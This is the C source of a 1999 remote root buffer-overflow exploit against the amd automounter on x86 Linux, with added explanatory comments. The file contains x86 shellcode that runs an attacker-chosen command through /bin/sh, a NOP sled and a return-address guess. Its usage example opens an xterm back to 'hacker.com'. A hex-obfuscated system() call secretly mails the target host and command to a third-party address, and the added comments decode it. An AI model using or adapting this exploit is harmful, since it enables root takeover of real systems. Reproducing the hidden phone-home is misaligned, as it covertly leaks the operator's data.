
  1. begin amd-ex.c
  2. ----------------------------------------------------------------------
  3. /*
  4.  
  5.     Amd Buffer Overflow for x86 linux
  6.  
  7.     Remote user can gain root access.
  8.  
  9.     Tested redhat linux : 4.0, 5.1, 6.0
  10.     Tested am-utils version : 6.0
  11.  
  12.     Requirements
  13.     /usr/sbin/amq
  14.  
  15.     Usage
  16.     $ amd-ex <hostname> <command> [offset]
  17.  
  18.     Warning : This program can crash amd.
  19.  
  20.     This program is for demonstrative use only.
  21.     USE IT AT YOUR OWN RISK!
  22.  
  23.     Programmed by Taeho Oh 1999/08/31
  24.  
  25. Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
  26. PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
  27. PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
  28.  
  29. */
  30.  
  31. #include<stdio.h>
  32. #include<stdlib.h>
  33.  
/* Default adjustment subtracted from the hard-coded stack guess in main()
 * (overridable via argv[3]). */
#define OFFSET                            0
/* RET_POSITION+RANGE+1 is the total length of the buffer built in main()
 * (1023 bytes) and passed to amq as the "-M" argument. */
#define RET_POSITION                   1002
/* Slack (in bytes) kept at the tail of the buffer for the address area;
 * main() uses RANGE*2 when sizing the padding. */
#define RANGE                            20
/* x86 single-byte NOP used for the padding region in main(). */
#define NOP                            0x90
  38.  
/*
 * x86 Linux payload stub (per-instruction comments are the original author's).
 * It ends in the string "/bin/sh -c ", to which main() appends the caller's
 * command with an unbounded strcat(); the array is oversized (1024) to make
 * room for that.  main() also rewrites the displacement/immediate bytes at
 * fixed indices (5, 13, 21, 32, 35, 42, 45) by strlen(command), so the index
 * arithmetic there is tied to this exact byte layout: changing a single
 * instruction here silently breaks those patches.
 */
char shellcode[1024]=
    "\xeb\x35"                      /* jmp 0x35             */
    "\x5e"                          /* popl %esi            */
    "\x89\x76\x0b"                  /* movl %esi,0xb(%esi)  */
    "\x89\xf0"                      /* movl %esi,%eax       */
    "\x83\xc0\x08"                  /* addl $0x8,%eax       */
    "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
    "\x89\xf0"                      /* movl %esi,%eax       */
    "\x83\xc0\x0b"                  /* addl $0xb,%eax       */
    "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
    "\x31\xc0"                      /* xorl %eax,%eax       */
    "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
    "\x88\x46\x0a"                  /* movb %eax,0xa(%esi)  */
    "\x88\x46\x0b"                  /* movb %eax,0xb(%esi)  */
    "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
    "\xb0\x0b"                      /* movb $0xb,%al        */
    "\x89\xf3"                      /* movl %esi,%ebx       */
    "\x8d\x4e\x0b"                  /* leal 0xb(%esi),%ecx  */
    "\x8d\x56\x0b"                  /* leal 0xb(%esi),%edx  */
    "\xcd\x80"                      /* int 0x80             */
    "\x31\xdb"                      /* xorl %ebx,%ebx       */
    "\x89\xd8"                      /* movl %ebx,%eax       */
    "\x40"                          /* inc %eax             */
    "\xcd\x80"                      /* int 0x80             */
    "\xe8\xc6\xff\xff\xff"          /* call -0x3a           */
    "/bin/sh -c ";                  /* .string "/bin/sh -c "*/
  65.  
/* Global copy of argv[2].  Filled by an unbounded strcpy() in main(), so an
 * argument longer than 799 bytes overflows this array before anything is
 * sent anywhere. */
char command[800];
  67.  
/*
 * Print the crash warning and the command-line synopsis on stdout.
 * Emits exactly the same three lines as the original printf() sequence.
 */
void usage()
{
    static const char *const lines[] = {
        "Warning : This program can crash amd\n",
        "Usage: amd-ex <hostname> <command> [offset]\n",
        "ex) amd-ex ohhara.target.com \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n",
    };
    size_t k;

    for (k = 0; k < sizeof lines / sizeof lines[0]; k++) {
        fputs(lines[k], stdout);
    }
}
  74.  
/*
 * Entry point.  Builds the oversized "-M" argument for /usr/sbin/amq from
 * argv and hands it over with execl().  The construction is byte-exact
 * (shellcode indices, RET_POSITION, RANGE, the final one-byte shift), so
 * it is annotated here rather than restructured.  Points a reviewer of
 * this listing should be aware of, all visible below:
 *   - strcpy()/strcat() from argv into the fixed-size target[256],
 *     command[800] and cmd[1024] are unbounded; over-long arguments
 *     overflow this program's own stack/global buffers.
 *   - strcpy/strcat/strlen and execl are used without <string.h> /
 *     <unistd.h>, i.e. through implicit declarations.
 *   - system(cmd) runs a hex-obfuscated local shell command that pipes the
 *     target host name and the command to /bin/mail addressed to a
 *     third party (decoded in the comments below).  Since `command` is
 *     spliced into that line unquoted, argv[2] is also interpreted by the
 *     local shell.  The author's own remark on that line invites removing it.
 *   - main() has no return statement.
 */
int main(int argc,char **argv)
{
    char buff[RET_POSITION+RANGE+1],*ptr;   /* 1023-byte payload buffer */
    char target[256];                       /* argv[1], unbounded copy */
    char cmd[1024];                         /* local shell line run via system() */
    long *addr_ptr,addr;
    unsigned long sp;
    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
    int i;

    printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
    printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
    printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");

    if(argc<3)
    {
        usage();
        exit(1);
    }

    /* No length check on either argument before the copies. */
    if(argc>2)
    {
        strcpy(target,argv[1]);
        strcpy(command,argv[2]);
    }
    /* atoi() gives no error indication; a non-numeric offset silently becomes 0. */
    if(argc>3)
        offset=atoi(argv[3]);

    /* Rewrite displacement/immediate bytes at fixed indices of the payload
     * stub by strlen(command), then append the command to it.  The arithmetic
     * is done in char (signedness is implementation-defined) and the strcat()
     * into shellcode[1024] is unbounded. */
    shellcode[5]=(shellcode[5]+strlen(command))/4*4+4;
    shellcode[13]=(shellcode[13]+strlen(command))/4*4+8;
    shellcode[21]=(shellcode[21]+strlen(command))/4*4+12;
    shellcode[32]=(shellcode[32]+strlen(command));
    shellcode[35]=(shellcode[35]+strlen(command))/4*4+16;
    shellcode[42]=(shellcode[42]+strlen(command))/4*4+4;
    shellcode[45]=(shellcode[45]+strlen(command))/4*4+16;
    strcat(shellcode,command);

    /* Hex-encoded pieces decode to:
     *   "echo " <target> " " <command> "|" "/bin/mail " "abuser@ohhara.postech.ac.kr"
     * i.e. the operator's target and command are mailed to a third party
     * when system(cmd) runs below.  None of the pieces is bounds-checked
     * against cmd[1024]. */
    strcpy(cmd,"\x65\x63\x68\x6f\x20");
    strcat(cmd,target);
    strcat(cmd,"\x20");
    strcat(cmd,command);
    strcat(cmd,"\x7c");
    strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20");
    strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68");
    strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63");
    strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72");

    /* Hard-coded guess of the remote stack address, adjusted by offset. */
    sp=0xbffff34d;
    addr=sp-offset;

    /* Fill the whole buffer with addr, one long at a time.  buff is a plain
     * char array with no guaranteed long alignment.  With bsize == 1023 the
     * last iteration (i == 1020) stores bytes 1020..1023, one byte past the
     * end of buff (indices 0..1022). */
    ptr=buff;
    addr_ptr=(long*)ptr;
    for(i=0;i<bsize;i+=4)
        *(addr_ptr++)=addr;

    /* NOP padding up to where the payload will be placed.  Mixed int/size_t
     * comparison: the bound is converted to size_t, so it would wrap to a
     * huge value if strlen(shellcode) ever exceeded bsize-RANGE*2 (983). */
    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
        buff[i]=NOP;

    /* Copy the payload so that it ends RANGE*2+1 bytes before the end. */
    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
    for(i=0;i<strlen(shellcode);i++)
        *(ptr++)=shellcode[i];

    buff[bsize-1]='\0';

    /* Shift the entire buffer right by one byte (buff[0] is duplicated,
     * the old last byte is dropped), then re-terminate. */
    for(i=bsize;i>1;i--)
        buff[i-1]=buff[i-2];

    buff[bsize-1]='\0';

    /* addr is a long printed with %x; only matches where long is 32 bits. */
    printf("Jump to 0x%08x\n",addr);

    /* Local phone-home (see decoded cmd above); runs before amq is invoked. */
    system(cmd); /* If you want, comment out this line. :) */
    /* execl() only returns on failure, and that failure is not checked. */
    execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL);
}
  149. ----------------------------------------------------------------------
  150. end amd-ex.c
  151.  
  152.  
  153.